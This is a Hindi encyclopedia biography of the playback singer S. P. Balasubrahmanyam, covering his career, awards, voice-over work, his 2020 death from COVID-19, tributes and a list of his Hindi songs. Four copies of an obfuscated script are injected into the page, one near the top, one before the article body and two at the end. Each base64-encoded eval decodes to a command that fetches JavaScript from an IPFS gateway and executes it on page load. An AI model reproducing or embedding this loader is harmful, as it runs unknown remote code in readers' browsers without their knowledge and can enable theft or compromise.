एस. पी. बालासुब्रमण्यम

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
एस. पी. बालासुब्रमण्यम
एस. पी. बालासुब्रमण्यम
पूरा नाम श्रीपति पण्डितराध्युल बालसुब्रमण्यम
प्रसिद्ध नाम एस. पी. बालासुब्रमण्यम
जन्म 4 जून, 1946
जन्म भूमि नेल्लोर, मद्रास
मृत्यु 25 सितंबर, 2020
मृत्यु स्थान चेन्नई, तमिलनाडु
पति/पत्नी सावित्री
संतान पुत्री- पल्लवी, पुत्र- चरण
कर्म भूमि भारत
कर्म-क्षेत्र हिंदी और तेलुगू सिनेमा
मुख्य फ़िल्में 'एक दूजे के लिए', 'मैंने प्यार किया', 'साजन', 'पत्थर के फूल', 'हम आपके हैं कौन' और 'रोजा' आदि।
पुरस्कार-उपाधि पद्मश्री (2001), पद्म भूषण (2011), राष्ट्रीय फ़िल्म पुरस्कार, नन्दी पुरस्कार
प्रसिद्धि पार्श्वगायक, संगीत निर्देशक और फ़िल्म निर्माता
नागरिकता भारतीय
अन्य जानकारी पिछले 5 दशक में एस. पी. बालासुब्रमण्यम करीब 16 भाषाओं में 40 हजार से ज्यादा गाने गा चुके हैं। येसुदास के बाद वह बेस्ट मेल सिंगर का नेशनल अवॉर्ड पाने वाले दूसरे सिंगर हैं।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>श्रीपति पण्डितराध्युल बालासुब्रमण्यम (अंग्रेज़ी: Sripathi Panditaradhyula Balasubrahmanyam, जन्म- 4 जून, 1946, नेल्लोर, मद्रास; मृत्यु- 25 सितंबर, 2020, चेन्नई, तमिलनाडु) भारतीय सिनेमा के प्रसिद्ध पार्श्वगायकों में से एक थे। पार्श्वगायक होने के साथ-साथ वह एक अभिनेता, संगीत निर्देशक, गायक और फ़िल्म निर्माता भी थे। एस. पी. बालासुब्रमण्यम ने छह बार सर्वश्रेष्ठ पार्श्वगायक के लिए 'राष्ट्रीय फ़िल्म पुरस्कार' और आन्ध्र प्रदेश सरकार द्वारा 25 बार तेलुगू सिनेमा में 'नन्दी पुरस्कार' जीता। जब अभिनेता सलमान ख़ान नए-नए फ़िल्मों में आए थे तो कई सालों तक एस.पी. बालासुब्रण्यम को सलमान ख़ान की आवाज़ समझा जाता था। फ़िल्म 'मैंने प्यार किया' के गाने हों या 'साजन' या फिर 'हम आपके हैं कौन'- इन सब फ़िल्मों में सलमान ख़ान को एस.पी. बालासुब्रमण्यम ने ही आवाज़ दी थी।

परिचय

एस. पी. बालासुब्रमण्यम को 'एसपीबी' या 'बालु' के नाम से भी जाना और पहचाना जाता है। उनका जन्म 4 जून सन 1946 को मद्रास के नेल्लोर (अब चित्तूर ज़िला, आंध्र प्रदेश) में हुआ था। सलमान ख़ान के साथ ही साथ उन्हें साउथ के सुपर स्टार कमल हासन की भी आवाज़ माना जाता था। एस. पी. बालासुब्रमण्यम ने इंजीनियंरिंग की पढ़ाई की। इसी दौरान उन्होंने संगीत की शिक्षा भी ली। एसपी ने 15 दिसंबर, 1966 को तेलुगु फिल्म 'श्री श्री मर्यादा रमन्ना' से गाने की शुरुआत की थी। उनकी पत्नी का नाम सावित्री है। उनके दो बच्चे हैं। एक बेटी पल्लवी और दूसरा बेटा चरण। उनका बेटा चरण भी प्लेबैक सिंगर और फिल्म प्रोड्यूसर है।[1]

15 साल बाद वापसी

एस. पी. बालासुब्रमण्यम ने 'एक दूजे के लिए', 'मैंने प्यार किया', 'पत्थर के फूल', 'हम आपके हैं कौन' और 'रोजा' जैसी पॉपुलर फिल्मों के गाने गाए। करीब 15 साल तक हिंदी फिल्मों से दूर रहने के बाद 2013 में उन्होंने शाहरुख ख़ान की फिल्म 'चेन्नई एक्सप्रेस' में गाना गाया था।

वॉइस ओवर आर्टिस्ट

वह बेहतरीन गायक, संगीतकार और प्रोड्यूसर होने के साथ ही साथ अच्छे वॉइस ओवर आर्टिस्ट भी थे। उन्होंने कमल हासन, रजनीकांत, सलमान ख़ान, शाहरुख ख़ान, अनिल कपूर, गिरीश कर्नाड और अर्जुन सरजा जैसे अभिनेताओं के लिए वॉइस ओवर किया। इतना ही नहीं फिल्म 'दशावतारम्' के तेलुगु वर्जन के लिए उन्होंने कमल हासन के सात किरदारों की आवाज़ का वॉइस ओवर भी किया। इसमें बूढ़ी औरत वाले किरदार की आवाज़ भी शामिल है।

पुरस्कार व सम्मान

एस. पी. बालासुब्रमण्यम को भारत सरकार ने 2001 में पद्मश्री और 2011 में पद्म भूषण से नवाजा था। पिछले 5 दशक में करीब 16 भाषाओं में 40 हजार से ज्यादा गाने वे गा चुके थे। येसुदास के बाद एस. पी. बालासुब्रमण्यम बेस्ट मेल सिंगर का नेशनल अवॉर्ड पाने वाले दूसरे सिंगर थे। येसुदास ने अपने कॅरियर के दौरान 8 नेशनल अवॉर्ड जीते थे, जबकि एस. पी. बालासुब्रमण्यम ने 6 नेशनल अवॉर्ड अपने नाम किए।

मृत्यु

कोरोना वायरस से संक्रमित हो जाने के कारण एस. पी. बालासुब्रमण्यम की मृत्यु 25 सितंबर, 2020 को चेन्नई में हुई। कोरोना संक्रमण की पुष्टि के बाद उन्हें 5 अगस्त, 2020 को एमजीएम हेल्थकेयर अस्पताल में इलाज के लिए लाया गया था। हालत बिगड़ने के बाद उन्हें जीवनरक्षक प्रणाली और ईसीएमओ (एक्स्ट्राकोर्पोरियल मेम्ब्रेन ऑक्सिडेशन सपोर्ट) पर रखा गया था।

प्रधानमंत्री नरेंद्र मोदी ने ट्वीट किया, "एसपी बालासुब्रमण्यम की मौत से हमारी सांस्कृतिक दुनिया को बहुत नुक़सान हुआ है। पूरे भारत में घर-घर पहचाना जाने वाला नाम, उनकी मधुर आवाज़ और संगीत ने दशकों तक श्रोताओं को मंत्रमुग्ध किया। दु:ख की इस घड़ी में उनके परिवार और उनके चाहने वालों के साथ मेरी संवेदनाएं हैं। ओम शांति।"[2]

गृहमंत्री अमित शाह ने भी एस.पी. बालासुब्रमण्यम की मौत पर दु:ख जताया। बॉलीवुड अभिनेता सलमान ख़ान ने लिखा- "एसपी बालासुब्रमण्यम सर के बारे में सुनकर दिल टूट गया। संगीत की अपनी विरासत में आप हमेशा याद किए जाएंगे। आपके परिवार के प्रति मेरी संवेदनाएं।"

क्रिकेट कमेंटेटर हर्ष भोगले ने भी उनकी मौत पर शोक व्यक्त करते हुए लिखा है- "बहुत दु:ख की बात है कि हम सब को एसपी बालासुब्रमण्यम को अलविदा कहना पड़ रहा है। लेकिन उन्होंने संगीत का आनंद लेने के लिए अपने पीछे एक शानदार लाइब्रेरी छोड़ रखी है।"

प्रमुख गीत

एस. पी. बालासुब्रमण्यम के प्रमुख गीत
क्र. सं. गीत फ़िल्म
1. दिल दीवाना बिन सजना के मैंने प्यार किया
2. मेरे रंग में रंगने वाली मैंने प्यार किया
3. आजा शाम होने आई मैंने प्यार किया
4. पहला पहला प्यार है... हम आपके हैं कौन
5. दीदी तेरा देवर दीवाना हम आपके हैं कौन
6. मुझसे जुदा होकर हम आपके हैं कौन
7. तुमसे जो देखते ही प्यार हुआ पत्थर के फूल
8. बहुत प्यार करते हैं तुमको सनम साजन
9. देखा है पहली बार, साजन की आंखों में साजन
10. रूप सुहाना लगता है, चांद पुराना लगता है दि जेंटलमैन
11. जिएं तो जिंए कैसे बिन आपके साजन
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

लाइफ सपोर्ट में कोरोना संक्रमित सिंगर एसपी बालासुब्रमण्यम,बिगड़ रही है तबीयत

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>